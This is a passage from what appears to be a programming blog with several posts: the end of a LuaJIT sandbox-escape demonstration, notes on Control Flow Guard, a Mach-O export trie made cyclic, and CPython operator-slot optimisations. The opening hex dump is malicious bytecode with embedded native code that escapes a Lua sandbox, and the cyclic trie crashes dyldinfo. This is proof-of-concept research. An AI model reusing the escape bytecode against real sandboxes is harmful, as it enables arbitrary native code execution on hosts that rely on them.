0000190: 0702 0012 0806 0029 0905 0029 0a08 0042 .......)...)...B
00001a0: 0704 0212 0803 0042 0801 0212 0608 0012 .......B........
00001b0: 0804 0012 0907 0042 0802 0212 0708 0016 .......B........
00001c0: 0804 0716 0801 082b 080a 0016 0805 0833 .......+.......3
00001d0: 0905 0012 0a09 0012 0b09 0016 0c06 0542 ...............B
00001e0: 0b02 0216 0b07 0b42 0a02 0233 0b06 0033 .......B...3...3
00001f0: 0c07 0027 0d08 0012 0e0c 0012 0f0b 0027 ...'...........'
0000200: 1009 0042 0f02 0216 0f08 0f42 0e02 0227 ...B.......B...'
0000210: 0f0a 0026 0d0f 0d12 0e0b 0012 0f0d 0042 ... amp;...........B
0000220: 0e02 0216 0e07 0e16 0e01 0e2b 0e0b 0027 ...........+...'
0000230: 0f0b 0029 1001 0029 110c 0029 1201 004d ...)...)...)...M
0000240: 1004 8012 140f 0012 150f 0026 0f15 144f ........... amp;...O
0000250: 10fc 7f12 100f 002d 1102 0012 120f 0026 .......-....... amp;
0000260: 1012 1012 110b 0012 1210 0042 1102 0216 ...........B....
0000270: 1107 1116 1209 111a 1309 1121 1113 123a ...........!...:
0000280: 1201 0e29 1300 003e 1300 0e19 1301 1119 ...)... gt;........
0000290: 1300 133e 1301 0e3a 1301 0e3e 1302 0e3a ... gt;...:... gt;...:
00002a0: 1301 0e3e 1303 0e2a 130a 003e 1304 0e3a ... gt;...*... gt;...:
00002b0: 1300 0e09 1305 0058 1302 8055 1301 8058 .......X...U...X
00002c0: 13fb 7f12 130c 0012 140b 0027 1509 0042 ...........'...B
00002d0: 1402 0216 140b 1442 1302 0227 140c 0012 .......B...'....
00002e0: 150c 0012 1611 0042 1502 0227 160c 0026 .......B...'... amp;
00002f0: 1316 132b 1308 0012 1413 003a 1501 0e12 ...+.......:....
0000300: 1612 0042 1403 0132 0000 804b 0001 0004 ...B...2...K....
0000310: c000 8001 c009 0000 0000 0690 1900 0000 ................
0000320: 0000 0000 0000 0000 0005 0000 00ff ffff ................
0000330: ff05 0d00 0000 0063 0400 0000 0000 0000 .......c........
0000340: 0000 0001 8080 c0fe 0701 8080 c099 0401 ................
0000350: 8080 c08f 0408 1000 3020 f82a 8040 8140 ........0 .*.@.@
0000360: 0088 02d2 0105 0115 0013 001a 2701 0000 ............'...
0000370: 2702 0100 2703 0200 2704 0300 2705 0400 '...'...'...'...
0000380: 2706 0500 2707 0600 2708 0700 2709 0800 '...'...'...'...
0000390: 270a 0900 270b 0500 270c 0a00 270d 0b00 '...'...'...'...
00003a0: 270e 0c00 270f 0d00 2710 0500 2711 0e00 '...'...'...'...
00003b0: 2712 0f00 2713 1000 2714 1100 2601 1401 '...'...'... amp;...
00003c0: 3302 1200 1203 0200 4203 0101 3200 0080 3.......B...2...
00003d0: 4b00 0100 0011 4865 6c6c 6f20 576f 726c K.....Hello Worl
00003e0: 640a 06c3 0848 8937 0949 8b72 080a ba07 d....H.7.I.r....
00003f0: 0000 0009 488b 7708 0849 8b3a 0ab8 0a00 ....H.w..I.:....
0000400: 0000 0ab8 0100 0000 0779 0c0a b84a 0000 .........y...J..
0000410: 0208 4885 c007 0f05 0aba 0c00 0000 0c48 ..H............H
0000420: 8d35 3300 0000 0abf 0100 0000 0ab8 0400 .53.............
0000430: 0002 094c 8b57 1000 ...L.W..
code
We can then run evil.lua either in our sandbox, or in luajit proper. Let's start with the latter:
code data-sourcepos="385:1-388:11"$ luajit evil.lua
Hello World
code
Running evil.lua in our sandbox first requires that we compile and build the sandbox. Ensuring that you link against the correct version of LuaJIT can be fiddly, as can forcing the correct address space layout on OSX. Once your environment is set up correctly, this can be as simple as:
code data-sourcepos="391:1-397:11"$ gcc sandbox.c -lluajit # On OSX, also pass:
# -pagezero_size 10000
# -image_base 100000000
$ ./a.out
Hello World
code
With that, we've seen that malicious LuaJIT bytecode can be used to escape from the tightest of Lua-level sandboxes, and result in arbitrary native code execution.
rarrhk;
Control flow guard
Posted on November 4, 2015
Microsoft recently introduced a new security feature called Control Flow Guard. At a basic level, this feature consists of a massive bit vector, and before any indirect function call is performed, the bit vector is consulted to determine whether the target of the call is valid or not. The end-goal is that the bit vector should specify all function entry addresses as valid, and all other addresses as invalid - thereby preventing malicious calls into the middle of functions. The structure of the bit vector is interesting, but most literature seems to get it wrong. For example, the Trend Micro report on Control Flow Guard states:
The status of every 8 bytes in the process space corresponds to a bit in CFGBitmap. If there is a function starting address in each group of 8 bytes, the corresponding bit in CFGBitmap is set to 1; otherwise it is set to 0.
Every bit in the CFGBitmap represents eight bytes in the process space. So if an invalid target call address has less than eight bytes from the valid function address, the CFG will think the target call address is quot;valid. quot;
Meanwhile, a POC2014 conference talk states:
One bit indicates 8bytes address and actually in most cases 16bytes
Every guard function address needs to be aligned to 0x10
If function address is not aligned to 0x10, it will use the odd bit only
In the bit vector (which Trend Micro calls CFGBitmap), every two bits correspond to sixteen bytes. Therefore, on average, every bit corresponds to eight bytes. However, the average is very misleading here, as in reality one of those two bits corresponds to one byte, and the other bit corresponds to fifteen bytes. This arrangement has several benefits:
On average, only one bit is required for every eight bytes.
If functions are aligned to sixteen byte boundaries (as is common), then the bit vector can perfectly and exactly represent the set of valid function entry addresses (by marking just the one byte as valid).
If functions aren't aligned to sixteen byte boundaries, then the bit vector still has some benefit.
Computing the bit index corresponding to an address remains relatively fast (do some bit shifting, then conditionally do | 1 if the address isn't 8 byte aligned).
rarrhk;
Exporting an infinite number of symbols
Posted on June 27, 2015
Dynamically loadable shared libraries typically come in one of a few formats:
As Mach-O files with the .dylib extension on OSX.
As ELF files with the .so extension on Linux.
As PE files with the .dll extension on Windows.
The whole point of dynamically loadable shared libraries is to export symbols,
and these formats typically store exported symbol information as a list of
exported symbols or a hash table of exported symbols. One nice property of
lists and hash tables is that they're finite by default: unless you deliberately
try to make them infinite, they'll be finite.
One oddity of the Mach-O format is that exported symbol information can be
represented as a trie. The term trie is meant to allude to tree, and trees
are also finite by default. However, a trie can also be thought of as a
directed rooted graph, and if that graph were to have a cycle, then the number
of paths in the graph would be infinite.
Let us begin with a file called finite.c:
codespan class="hljs-function"span class="hljs-keyword"voidspan span class="hljs-title"corsixspanspan class="hljs-params"()span span{}
span class="hljs-function"span class="hljs-keyword"voidspan span class="hljs-title"corsix_spanspan class="hljs-params"()span span{}
span class="hljs-preprocessor"#span class="hljs-keyword"definespan C2(x) void corsix_##x() {}span
span class="hljs-preprocessor"#span class="hljs-keyword"definespan C1(x) C2(x##a) C2(x##b) C2(x##c) C2(x##d) C2(x##e)span
span class="hljs-preprocessor"#span class="hljs-keyword"definespan C0(x) C1(x##a) C1(x##b) C1(x##c) C1(x##d) C1(x##e)span
C0(a) C0(b) C0(c) C0(d) C0(e)
code
We can compile this to a shared library like so:
code data-sourcepos="29:1-31:40"$ clang finite.c -shared -o finite.dylib
code
This gives us a shared library called finite.dylib which exports
127 symbols: corsix, corsix_, and the 125 symbols matching the
regex corsix_[a-e][a-e][a-e]. These symbols aren't overly interesting,
and the sheer number of symbols is merely to ensure that the exported
symbol trie in finite.dylib occupies sufficiently many bytes.
The exported symbol trie in finite.dylib looks something like the
following diagram:
code data-sourcepos="40:1-50:61" +- quot;a quot;- gt; corsix_a ...
|
+- quot;b quot;- gt; corsix_b ...
|
root - quot;_corsix quot;- gt; corsix - quot;_ quot;- gt; corsix_ -+- quot;c quot;- gt; corsix_c ...
|
+- quot;d quot;- gt; corsix_d ...
|
+- quot;e quot;- gt; corsix_e ...
code
Our aim is to replace the exported symbol trie with something like the
following diagram:
code data-sourcepos="54:1-68:30" +- lt;--- quot;_ quot;---+
| |
root - quot;_corsix quot;-+- gt; corsix --+
| |
+- lt;--- quot;a quot;---+
| |
+- lt;--- quot;b quot;---+
| |
+- lt;--- quot;c quot;---+
| |
+- lt;--- quot;d quot;---+
| |
+- lt;--- quot;e quot;---+
code
With such a trie, the symbol originally called corsix should now be
exported under all the names matching the regex corsix[_a-e]*. We
could also go slightly further, adding more looping edges to the trie,
in order to reach corsix[_a-z0-9]*.
We'll use the following transform.lua program to do the dirty work of
trie replacement:
codedylib = span class="hljs-built_in"iospan.readspan class="hljs-string""*a"span
nof, pos, tsz = dylib:matchspan class="hljs-string""_corsix%z(.)()(.)"span
node = dylib:sub(pos, pos + tsz:byte()) .. span class="hljs-string""\37"span ..
(span class="hljs-string""_abcdefghijklmnopqrstuvwxyz0123456789"span):gsub(span class="hljs-string""."span, span class="hljs-string""%0\0"span .. nof)
span class="hljs-built_in"iospan.write(dylib:sub(span class="hljs-number"1span, pos-span class="hljs-number"1span) .. node .. dylib:sub(pos + #node))
code
Running the program like so will generate a file called infinite.dylib:
code data-sourcepos="85:1-87:49"$ lua transform.lua lt;finite.dylib gt;infinite.dylib
code
We'll then use the following client.cpp program to query the exported
symbols of the two .dylib files:
codespan class="hljs-preprocessor"#span class="hljs-keyword"includespan lt;dlfcn.h gt;span
span class="hljs-preprocessor"#span class="hljs-keyword"includespan lt;stdio.h gt;span
span class="hljs-function"span class="hljs-keyword"voidspan span class="hljs-title"check_dylibspanspan class="hljs-params"(span class="hljs-keyword"constspan span class="hljs-keyword"charspan* path)span span{
span class="hljs-keyword"voidspan* dylib = dlopen(path, RTLD_LOCAL);
span class="hljs-built_in"printfspan(span class="hljs-string""\nName lookup results in %s:\n"span, path);
span class="hljs-keyword"constspan span class="hljs-keyword"charspan* names[] = {
span class="hljs-string""foobar23"span, span class="hljs-string""corsix"span, span class="hljs-string""corsix_aaa"span, span class="hljs-string""corsix_abc"span,
span class="hljs-string""corsix_xyz"span, span class="hljs-string""corsix_foobar23"span, span class="hljs-string""corsix_dot_org"span
};
span class="hljs-keyword"forspan (span class="hljs-keyword"constspan span class="hljs-keyword"charspan* name : names) {
span class="hljs-built_in"printfspan(span class="hljs-string""%-15s - gt; %p\n"span, name, dlsym(dylib, name));
}
}
span class="hljs-function"span class="hljs-keyword"intspan span class="hljs-title"mainspanspan class="hljs-params"()span span{
check_dylib(span class="hljs-string""./finite.dylib"span);
check_dylib(span class="hljs-string""./infinite.dylib"span);
span class="hljs-keyword"returnspan span class="hljs-number"0span;
}
code
Compiling and running gives the following output:
code data-sourcepos="115:1-135:30"$ clang -std=c++11 client.cpp amp; amp; ./a.out
Name lookup results in ./finite.dylib:
foobar23 - gt; 0x0
corsix - gt; 0x1076347b0
corsix_aaa - gt; 0x1076347d0
corsix_abc - gt; 0x107634840
corsix_xyz - gt; 0x0
corsix_foobar23 - gt; 0x0
corsix_dot_org - gt; 0x0
Name lookup results in ./infinite.dylib:
foobar23 - gt; 0x0
corsix - gt; 0x1076377b0
corsix_aaa - gt; 0x1076377b0
corsix_abc - gt; 0x1076377b0
corsix_xyz - gt; 0x1076377b0
corsix_foobar23 - gt; 0x1076377b0
corsix_dot_org - gt; 0x1076377b0
code
I don't know of any particularly useful reason for exporting an infinite number of symbols,
but it does trip up Apple's dyldinfo tool,
and it might also trip up other tools of a similar nature:
code data-sourcepos="140:1-168:22"$ dyldinfo -export infinite.dylib
export information (from trie):
Segmentation fault: 11
$ dyldinfo -export_dot infinite.dylib
digraph {
node000;
node000 - gt; node011 [ label=_corsix ] ;
node011 [ label=_corsix,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix_,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix__,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix___,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix____,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix_____,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix______,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix_______,addr0x000007B0 ];
node011 - gt; node011 [ label=_ ] ;
node011 [ label=_corsix________,addr0x000007B0 ];
... 15000 lines of output ommitted ...
Segmentation fault: 11
code
rarrhk;
Why are slots so slow?
Posted on May 3, 2015
One of the points in Armin Ronacher's The Python I Would Like To See is that slots are slow. That is, A() + A() is slower than A().__add__(A()) in the context of the following:
codespan class="hljs-class"span class="hljs-keyword"classspan span class="hljs-title"Aspanspan class="hljs-params"(object)span:span
span class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"__add__spanspan class="hljs-params"(self, other)span:span
span class="hljs-keyword"returnspan span class="hljs-number"42span
code
I'd like to investigate this claim for myself. To begin, let us repeat the experiment and see whether we get the same result:
code data-sourcepos="9:1-28:46"$ cat x.py
class A(object):
def __add__(self, other):
return 42
$ ./python.exe
Python 3.5.0a4+ (default, Apr 25 2015, 21:57:28)
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.49)] on darwin
Type quot;help quot;, quot;copyright quot;, quot;credits quot; or quot;license quot; for more information.
gt; gt; gt; from x import A
gt; gt; gt; a = A()
gt; gt; gt; b = A()
gt; gt; gt; a + b
42
gt; gt; gt; quit()
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
1000000 loops, best of 3: 0.215 usec per loop
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a.__add__(b)'
10000000 loops, best of 3: 0.113 usec per loop
code
It would seem that Armin's claim stands up; a + b is indeed considerably slower than a.__add__(b).
First of all, an implicit assumption of Armin's claim is that a + b should be equivalent to a.__add__(b). Let us check this assumption by asking what does a + b mean in Python? The documentation for + is probably a good place to start:
The + (addition) operator yields the sum of its arguments. The arguments must either both be numbers or both be sequences of the same type. In the former case, the numbers are converted to a common type and then added together. In the latter case, the sequences are concatenated.
Well, uh, that doesn't explain the observed behaviour of a + b giving 42. Perhaps the documentation for __add__ will shed some light on the situation:
These methods are called to implement the binary arithmetic operations (+, [...]). For instance, to evaluate the expression x + y, where x is an instance of a class that has an __add__() method, x.__add__(y) is called. [...] If one of those methods does not support the operation with the supplied arguments, it should return NotImplemented.
Well, that explains the observed behaviour, and seems to pretty much straight up say that a + b means a.__add__(b). However, let's not get ahead of ourselves. On the off chance that it is relevant, let's consider the documentation for __radd__:
These methods are called to implement the binary arithmetic operations (+, [...]) with reflected (swapped) operands. These functions are only called if the left operand does not support the corresponding operation and the operands are of different types. For instance, to evaluate the expression x - y, where y is an instance of a class that has an __rsub__() method, y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented.
Well, whad'ya know, it was relevant. With this extra bit of information, it seems like a + b is equivalent to something like:
codespan class="hljs-keyword"ifspan __add__ span class="hljs-keyword"inspan a:
tmp = a.__add__(b)
span class="hljs-keyword"elsespan:
tmp = span class="hljs-built_in"NotImplementedspan
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-built_in"NotImplementedspan span class="hljs-keyword"andspan type(a) != type(b):
span class="hljs-keyword"returnspan b.__radd__(a)
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan tmp
code
Of course, the story doesn't end there; immediately after the piece of documentation quoted above is the following gem:
Note: If the right operand鈥檚 type is a subclass of the left operand鈥檚 type and that subclass provides the reflected method for the operation, this method will be called before the left operand鈥檚 non-reflected method. This behavior allows subclasses to override their ancestors鈥 operations.
Bearing this in mind, maybe a + b is equivalent to something like:
codespan class="hljs-keyword"ifspan issubclass(type(b), type(a)) span class="hljs-keyword"andspan __radd__ span class="hljs-keyword"inspan b:
tmp = b.__radd__(a)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-built_in"NotImplementedspan:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan __add__ span class="hljs-keyword"inspan a:
tmp = a.__add__(b)
span class="hljs-keyword"elsespan:
tmp = span class="hljs-built_in"NotImplementedspan
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-built_in"NotImplementedspan span class="hljs-keyword"andspan type(a) != type(b):
span class="hljs-keyword"returnspan b.__radd__(a)
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan tmp
code
I wish that the above were the full story, but alas it is not. Let us pluck another link out of thin air, this time to the documentation on special method lookup:
For custom classes, implicit invocations of special methods are only guaranteed to work correctly if defined on an object鈥檚 type, not in the object鈥檚 instance dictionary. [...] In addition to bypassing any instance attributes in the interest of correctness, implicit special method lookup generally also bypasses the __getattribute__() method even of the object鈥檚 metaclass.
I like to interpret this paragraph as saying bugger it, a + b means whatever the CPython interpreter does for a + b . Having studied the interpreter, the meaning of a + b is equivalent to something along the lines of the following:
codespan class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"getspanspan class="hljs-params"(x, field)span:span
span class="hljs-keyword"tryspan:
span class="hljs-keyword"returnspan getattr(type(x), field) span class="hljs-comment"# Doesn't call __getattribute__span
span class="hljs-keyword"exceptspan AttributeError:
span class="hljs-keyword"returnspan span class="hljs-keyword"Nonespan
span class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"hasspanspan class="hljs-params"(x, field)span:span
span class="hljs-keyword"returnspan get(x, field) span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-keyword"Nonespan
span class="hljs-comment"# From now on, `x.__yzw__` means `get(x, '__yzw__')`span
span class="hljs-comment"# and `__abc__ in d` means `has(d, '__abc__')`span
span class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"tp_add_slotspanspan class="hljs-params"(x)span:span
span class="hljs-keyword"ifspan x span class="hljs-keyword"isspan a builtin type span class="hljs-keyword"orspan a type span class="hljs-keyword"fromspan a C extension:
span class="hljs-keyword"returnspan ?
span class="hljs-keyword"elifspan __add__ span class="hljs-keyword"inspan x span class="hljs-keyword"orspan __radd__ span class="hljs-keyword"inspan x:
span class="hljs-keyword"returnspan slot_nb_add
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan span class="hljs-keyword"Nonespan
span class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"sq_concat_slotspanspan class="hljs-params"(x)span:span
span class="hljs-keyword"returnspan ?
span class="hljs-function"span class="hljs-keyword"defspan span class="hljs-title"slot_nb_addspanspan class="hljs-params"(x, y)span:span
do_other = type(x) != type(y) span class="hljs-keyword"andspan tp_add_slot(y) == slot_nb_add span class="hljs-keyword"andspan __radd__ span class="hljs-keyword"inspan y
span class="hljs-keyword"ifspan tp_add_slot(x) == slot_nb_add:
span class="hljs-keyword"ifspan do_other span class="hljs-keyword"andspan issubclass(type(y), type(x)) span class="hljs-keyword"andspan (__radd__ span class="hljs-keyword"notspan span class="hljs-keyword"inspan x span class="hljs-keyword"orspan x.__radd__ != y.__radd__):
tmp = y.__radd__(x)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-built_in"NotImplementedspan:
do_other = span class="hljs-keyword"Falsespan
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan __add__ span class="hljs-keyword"inspan x:
tmp = x.__add__(y)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-built_in"NotImplementedspan:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan do_other:
span class="hljs-keyword"returnspan y.__radd__(x)
span class="hljs-keyword"returnspan span class="hljs-built_in"NotImplementedspan
slota = tp_add_slot(a)
slotb = tp_add_slot(b)
slotc = sq_concat_slot(a)
span class="hljs-keyword"ifspan slota == slotb:
span class="hljs-keyword"returnspan slota(a, b)
span class="hljs-keyword"ifspan slota span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-keyword"Nonespan span class="hljs-keyword"andspan slotb span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-keyword"Nonespan span class="hljs-keyword"andspan issubclass(type(b), type(a)):
tmp = slotb(a, b)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-built_in"NotImplementedspan:
slotb = span class="hljs-keyword"Nonespan
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan slota span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-keyword"Nonespan:
tmp = slota(a, b)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-keyword"notspan NotImplementd:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan slotb span class="hljs-keyword"isspan span class="hljs-keyword"notspan span class="hljs-keyword"Nonespan:
tmp = slotb(a, b)
span class="hljs-keyword"ifspan tmp span class="hljs-keyword"isspan span class="hljs-keyword"notspan NotImplementd:
span class="hljs-keyword"returnspan tmp
span class="hljs-keyword"ifspan slotc span class="hljs-keyword"isspan span class="hljs-keyword"Nonespan:
span class="hljs-keyword"raisespan error
span class="hljs-keyword"elsespan:
span class="hljs-keyword"returnspan slotc(a, b)
code
The conclusion of the above exploration is that a + b has a rather more nuanced meaning than just a.__add__(b). If we accept this conclusion, then perhaps it shouldn't be surprising that a + b is slower than a.__add__(b). However, in our case, a and b are the same type, so the above pseudo-code should pretty quickly conclude that the meaning of a + b, in our case, is just a.__add__(b).
Let us consider an alternative conclusion: the people behind the CPython interpreter have spent more time optimising a.__add__(b) than they have spent optimising a + b. To test this hypothesis, we need to dig into the bytecode of these two expressions. If we ignore the bytecode which is common to both expressions, then we can say that a.__add__(b) consists of two bytecode instructions (LOAD_ATTR and CALL_FUNCTION), while a + b consists of just a single bytecode instruction (BINARY_ADD).
Let's begin with a.__add__(b) and look at what happens when the bytecode is executed:
Begin LOAD_ATTR instruction.
Call PyObject_GetAttr.
Call PyObject_GenericGetAttr (via the tp_getattro slot in type(a)).
Call _PyObject_GenericGetAttrWithDict.
Call _PyType_Lookup.
Successfully find __add__ in the method cache.
Return a function object to _PyObject_GenericGetAttrWithDict.
Call func_descr_get (via the tp_descr_get slot in the type of the function object).
Call PyMethod_New (to bind a to the first argument of the function).
Return a method object from PyObject_GetAttr.
Push the method object onto the stack.
End LOAD_ATTR instruction.
Begin CALL_FUNCTION instruction.
Call call_function.
Realise that we have a method object.
Replace the stack entry underneath b with the bound argument from the method object.
Call fast_function with the function from the method object.
Call PyFrame_New to create a new stack frame.
Call PyEval_EvalFrameEx to actually evaluate our __add__ code.
Return 42 from call_function.
Free the method object.
End CALL_FUNCTION instruction.
On the other hand, for a + b, we have:
Begin BINARY_ADD instruction.
Call PyNumber_Add.
Call binary_op1.
Call slot_nb_add (via the tp_add slot in type(a)) [slot_nb_add is defined via a SLOT1BIN macro].
Call call_maybe(a, amp;Id__add__, quot;(O) quot;, b) [call_maybe is variadic after the string parameter].
Call lookup_maybe [lookup_maybe is like PyObject_GetAttr, but only looks in the type, and doesn't invoke __getattribute__].
Call _PyType_LookupId.
Call _PyUnicode_FromId [this converts Id__add__ into a PyObject representing quot;__add__ quot;, but this conversion is cached, and therefore effectively free].
Call _PyType_Lookup [as in step 5 above].
Successfully find __add__ in the method cache [as in step 6 above].
Return a function object from _PyType_LookupId.
Call func_descr_get (via the tp_descr_get slot in the type of the function object) [as in step 8 above].
Call PyMethod_New (to bind a to the first argument of the function) [as in step 9 above].
Return a method object from lookup_maybe.
Call Py_VaBuildValue, passing the string literal quot;(O) quot; and a reference to call_maybe's variadic arguments.
Do a tonne of string literal parsing and variadic argument fetching and tuple construction, resulting in Py_VaBuildValue eventually returning a singleton tuple containing b.
Call method_call (via the tp_call slot in the type of the method object).
Construct a new two-element tuple, filling it with the bound argument from the method object, and the contents of the previously constructed singleton tuple. In other words, we now have the tuple (a, b).
Call function_call (via the tp_call slot in the type of the function from the method object).
Call PyEval_EvalCodeEx.
Call _PyEval_EvalCodeWithName.
Call PyFrame_New to create a new stack frame [as in step 18 above].
Call PyEval_EvalFrameEx to actually evaluate our __add__ code [as in step 19 above].
Return 42 from function_call.
Free the two-element tuple.
Return 42 from method_call.
Free the singleton tuple.
Free the method object.
Return 42 from PyNumber_Add.
End BINARY_ADD instruction.
One obvious diference is that a + b does far more manipulation of tuples and of variadic arguments. Given that call_maybe is always called with a format of quot;(O) quot;, let's acknowledge this by changing its signature to be fixed-arg rather than vararg, and also construct an argument tuple via PyTuple_New / PyTuple_SET_ITEM rather than Py_VaBuildValue:
codediff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..d27cc07 100644
span class="hljs-header"--- a/Objects/typeobject.cspan
span class="hljs-header"+++ b/Objects/typeobject.cspan
@@ -1465,29 +1465,22 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
/* Clone of call_method() that returns NotImplemented when the lookup fails. */
static PyObject *
span class="hljs-deletion"-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)span
span class="hljs-addition"+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)span
{
span class="hljs-deletion"- va_list va;span
PyObject *args, *func = 0, *retval;
span class="hljs-deletion"- va_start(va, format);span
func = lookup_maybe(o, nameid);
if (func == NULL) {
span class="hljs-deletion"- va_end(va);span
if (!PyErr_Occurred())
Py_RETURN_NOTIMPLEMENTED;
return NULL;
}
span class="hljs-deletion"- if (format amp; amp; *format)span
span class="hljs-deletion"- args = Py_VaBuildValue(format, va);span
span class="hljs-deletion"- elsespan
span class="hljs-deletion"- args = PyTuple_New(0);span
span class="hljs-deletion"-span
span class="hljs-deletion"- va_end(va);span
span class="hljs-deletion"-span
span class="hljs-addition"+ args = PyTuple_New(1);span
if (args == NULL)
return NULL;
span class="hljs-addition"+ PyTuple_SET_ITEM(args, 0, p);span
span class="hljs-addition"+ Py_XINCREF(p);span
assert(PyTuple_Check(args));
retval = PyObject_Call(func, args, NULL);
@@ -5624,20 +5617,20 @@ FUNCNAME(PyObject *self, PyObject *other) \
if (do_other amp; amp; \
PyType_IsSubtype(Py_TYPE(other), Py_TYPE(self)) amp; amp; \
method_is_overloaded(self, other, amp;rop_id)) { \
span class="hljs-deletion"- r = call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ r = call_maybe(other, amp;rop_id, self); \span
if (r != Py_NotImplemented) \
return r; \
Py_DECREF(r); \
do_other = 0; \
} \
span class="hljs-deletion"- r = call_maybe(self, amp;op_id, "(O)", other); \span
span class="hljs-addition"+ r = call_maybe(self, amp;op_id, other); \span
if (r != Py_NotImplemented || \
Py_TYPE(other) == Py_TYPE(self)) \
return r; \
Py_DECREF(r); \
} \
if (do_other) { \
span class="hljs-deletion"- return call_maybe(other, amp;rop_id, "(O)", self); \span
span class="hljs-addition"+ return call_maybe(other, amp;rop_id, self); \span
} \
Py_RETURN_NOTIMPLEMENTED; \
}
code
This gives a nice little speedup; we're down from 0.215 usec to 0.176 usec:
code data-sourcepos="275:1-280:46"$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.176 usec per loop
code
We're still falling somewhat short the of 0.113 usec time set by a.__add__(b), so let's copy step 15 of a.__add__(b) and special-case method objects:
codediff --git a/Objects/typeobject.c b/Objects/typeobject.c
index 4b99287..2cd8e23 100644
span class="hljs-header"--- a/Objects/typeobject.cspan
span class="hljs-header"+++ b/Objects/typeobject.cspan
@@ -1465,36 +1465,43 @@ call_method(PyObject *o, _Py_Identifier *nameid, char *format, ...)
/* Clone of call_method() that returns NotImplemented when the lookup fails. */
static PyObject *
span class="hljs-deletion"-call_maybe(PyObject *o, _Py_Identifier *nameid, char *format, ...)span
span class="hljs-addition"+call_maybe(PyObject *o, _Py_Identifier *nameid, PyObject* p)span
{
span class="hljs-deletion"- va_list va;span
span class="hljs-deletion"- PyObject *args, *func = 0, *retval;span
span class="hljs-deletion"- va_start(va, format);span
span class="hljs-addition"+ PyObject *args[2], *func = 0, *retval, *tuple;span
span class="hljs-addition"+ int na = 1;span
func = lookup_maybe(o, nameid);
if (func == NULL) {
span class="hljs-deletion"- va_end(va);span
if (!PyErr_Occurred())
Py_RETURN_NOTIMPLEMENTED;
return NULL;
}
span class="hljs-deletion"- if (format amp; amp; *format)span
span class="hljs-deletion"- args = Py_VaBuildValue(format, va);span
span class="hljs-deletion"- elsespan
span class="hljs-deletion"- args = PyTuple_New(0);span
span class="hljs-deletion"-span
span class="hljs-deletion"- va_end(va);span
span class="hljs-deletion"-span
span class="hljs-deletion"- if (args == NULL)span
span class="hljs-deletion"- return NULL;span
span class="hljs-addition"+ args[1] = p;span
span class="hljs-addition"+ if (PyMethod_Check(func) amp; amp; PyMethod_GET_SELF(func) != NULL) {span
span class="hljs-addition"+ PyObject *mself = PyMethod_GET_SELF(func);span
span class="hljs-addition"+ PyObject *mfunc = PyMethod_GET_FUNCTION(func);span
span class="hljs-addition"+ args[0] = mself;span
span class="hljs-addition"+ na = 2;span
span class="hljs-addition"+ Py_INCREF(mfunc);span
span class="hljs-addition"+ Py_DECREF(func);span
span class="hljs-addition"+ func = mfunc;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ args[0] = NULL;span
span class="hljs-addition"+ }span
span class="hljs-deletion"- assert(PyTuple_Check(args));span
span class="hljs-deletion"- retval = PyObject_Call(func, args, NULL);span
span class="hljs-addition"+ tuple = PyTuple_New(na);span
span class="hljs-addition"+ if (tuple == NULL) {span
span class="hljs-addition"+ retval = NULL;span
span class="hljs-addition"+ } else {span
span class="hljs-addition"+ memcpy(((PyTupleObject *)tuple)- gt;ob_item, args, sizeof(PyObject*) * na);span
span class="hljs-addition"+ Py_XINCREF(args[0]);span
span class="hljs-addition"+ Py_XINCREF(args[1]);span
span class="hljs-addition"+ retval = PyObject_Call(func, tuple, NULL);span
span class="hljs-addition"+ Py_DECREF(tuple);span
span class="hljs-addition"+ }span
span class="hljs-deletion"- Py_DECREF(args);span
Py_DECREF(func);
span class="hljs-deletion"-span
return retval;
}
